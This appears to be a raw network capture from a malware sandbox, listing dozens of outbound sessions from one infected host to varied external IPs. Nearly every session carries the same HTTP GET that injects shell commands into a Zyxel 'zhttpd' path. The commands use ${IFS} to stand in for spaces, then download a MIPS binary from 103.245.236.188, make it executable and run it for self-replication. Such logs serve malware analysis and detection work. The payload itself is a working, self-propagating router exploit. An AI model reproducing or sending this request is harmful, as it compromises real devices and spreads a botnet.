                                                Jan 12, 2024 18:16:32.674526930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6773192.168.2.2336230160.95.60.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674566031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6774192.168.2.2339682179.174.138.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674626112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6775192.168.2.233496650.70.225.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674684048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6776192.168.2.2360174100.140.78.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674729109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6777192.168.2.234156899.39.219.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674767971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6778192.168.2.235177227.45.62.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674840927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6779192.168.2.2353208107.237.75.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674864054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6780192.168.2.2337358126.219.189.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674894094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6781192.168.2.2355470193.149.6.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.674978971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6782192.168.2.235618640.86.84.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675028086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6783192.168.2.2357076195.140.82.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675081015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6784192.168.2.2351204218.157.100.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675143957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6785192.168.2.2338588181.255.222.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675225019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6786192.168.2.2344580117.162.246.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675256968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6787192.168.2.2352734176.87.80.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675313950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6788192.168.2.233875059.61.70.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675384045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6789192.168.2.2358096100.36.95.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675430059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6790192.168.2.2343880149.110.38.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675482035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6791192.168.2.235426057.33.73.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675538063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6792192.168.2.233651862.156.180.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675595999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6793192.168.2.2341232207.78.65.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675657988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6794192.168.2.235228068.177.79.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675710917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6795192.168.2.233342854.232.248.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675776005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6796192.168.2.233737671.195.170.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675821066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6797192.168.2.233316861.117.118.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675846100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6798192.168.2.235977419.121.215.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675918102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6799192.168.2.2332814130.181.201.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.675982952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6800192.168.2.2353710104.107.235.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676009893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6801192.168.2.2334726161.42.252.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676083088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6802192.168.2.233974688.118.137.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676139116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6803192.168.2.2333020132.54.12.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676198006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6804192.168.2.2343062155.156.72.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676234961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6805192.168.2.2340146121.2.98.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676279068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6806192.168.2.2347816163.2.229.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676348925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6807192.168.2.2334770128.45.77.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676400900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6808192.168.2.2343200140.138.15.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676435947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6809192.168.2.236053090.224.66.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676477909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6810192.168.2.233877458.87.220.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676556110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6811192.168.2.235823649.180.207.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676593065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6812192.168.2.2359424112.65.122.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676634073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6813192.168.2.235291096.21.70.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676695108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6814192.168.2.2341390167.79.217.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676748037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6815192.168.2.235892695.24.85.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676805019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6816192.168.2.235853248.14.211.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676862001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6817192.168.2.2354010221.161.119.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676906109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6818192.168.2.233713439.135.166.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.676970005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6819192.168.2.2354322122.38.143.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677006960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6820192.168.2.235678072.217.95.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677083969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6821192.168.2.2338288140.253.217.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677133083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6822192.168.2.235286097.132.248.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677187920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6823192.168.2.233578468.156.242.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677256107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6824192.168.2.235285423.251.49.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677328110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6825192.168.2.235383093.116.237.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677381039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6826192.168.2.2359374183.93.66.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677432060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6827192.168.2.2356960217.200.196.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677503109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6828192.168.2.235188275.11.26.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677535057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6829192.168.2.2334718208.107.153.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677649975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6830192.168.2.233703897.142.245.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677702904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6831192.168.2.2358136119.69.180.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677755117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6832192.168.2.2347688203.62.204.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677824020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6833192.168.2.2357202210.197.42.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677851915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6834192.168.2.2349284184.0.229.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.677920103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6835192.168.2.234959266.139.180.166443
                                                TimestampBytes transferredDirectionData
